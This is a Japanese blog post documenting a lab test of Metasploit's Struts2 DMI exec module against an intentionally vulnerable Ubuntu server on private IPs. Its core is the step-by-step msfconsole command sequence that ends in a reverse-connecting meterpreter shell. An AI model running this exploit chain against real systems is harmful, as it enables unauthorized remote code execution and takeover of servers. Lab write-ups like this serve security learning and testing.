ウサギは後退せず、大きな耳で情報集めをする事に験を担ぎ、古来より日本では鎧などにウサギの図柄を取り入れてきたらしい。
読者です 読者をやめる 読者になる 読者になる

うさブロ

ぼっちなうさぎのセキュリティラボ

Apache Struts2用のMetasploit Moduleを使う【攻撃編】

Kali Linux Metasploit

準備が整ったところで検証という名の攻撃開始w

攻撃準備

やられサーバ(Ubuntu)

  • IP:192.168.10.21
  • TargetURI:/showcase/index.action

攻撃側(Kali Linux)

  • IP:192.168.10.18

 

攻撃側のコンソールで

 msfconsole

と入力して Metasploit を起動させる。起動したら

 use exploit/linux/http/struts_dmi_exec

f:id:appleseedj073:20160505222627p:plain

指定したら次は option の入力

 set RHOST 192.168.10.21

 set TARGETURI /showcase/index.action

 set LHOST 192.168.10.18

f:id:appleseedj073:20160505222732p:plain

必要事項を入力したら Exploit

 exploit

f:id:appleseedj073:20160505222754p:plain

無事にセッションが貼れたら meterpreter のコマンドラインになるので meterpreter のコマンドを入力すれば Good!

 sysinfo

f:id:appleseedj073:20160505222818p:plain

とりあえず exploit が成功して無事に payload が行われてリバースコネクトされているのが確認できた。ちなみにこの exploitcode はデフォルトで payload が指定されている。(linux/x86/meterpreter/reverse_tcp_uuid)

 

こんだけ簡単に出来てしまうのは、やはり脅威と言えるのではないのでしょうか?